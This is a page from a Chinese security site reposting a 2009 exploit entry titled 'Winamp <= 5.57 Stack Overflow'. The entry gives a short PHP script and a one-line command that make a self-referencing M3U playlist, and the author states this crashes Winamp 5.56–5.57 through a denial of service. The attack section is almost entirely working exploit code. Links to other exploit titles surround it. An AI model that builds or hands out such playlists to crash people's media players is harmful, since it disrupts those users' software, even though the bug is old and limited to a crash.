首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Winamp <= 5.57 Stack Overflow
来源:scriptjunkie.1 {nospam} googlemail {nospam} com 作者:scriptjunkie 发布时间:2009-12-23  

# Exploit Title: Winamp <= 5.57 Stack Overflow
# Date: 22 Dec 2009
# Author: scriptjunkie, scriptjunkie.1 {nospam} googlemail {nospam} com
# Software Link: http://www.winamp.com/media-player
# Version: 5.57, 5.56
# Tested on: Windows XP, Windows 7
# CVE: none at time of writing
# Code:

PHP:

<?php
header("Content-type: audio/x-mpegurl");
echo $_SERVER["SCRIPT_URI"]."/blah.m3u";
?>

 

Local M3U:
echo "a.m3u" > a.m3u

# OMG WE'RE PWNED: chill, it's not a stack buffer overflow, just a stack overflow. DoS.


 
[推荐] [评论(1条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·3Com OfficeConnect Routers DoS
·CoolPlayer 2.18 M3U Playlist B
·TLS Renegotiation Vulnerabilit
·PlayMeNow Malformed (M3U) Univ
·PlayMeNow Malformed M3U Playli
·Easy RM to MP3 27.3.700 WinXP
·Simple PHP Blog <= 0.5.1 Local
·TFTP Daemon v1.9 Denial of Ser
·Simple PHP Blog v0.5.1 Local F
·corehttp remote command execut
·linux 2.6.18-20 2009 Local Roo
·Printoxx Local Buffer Overflow
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved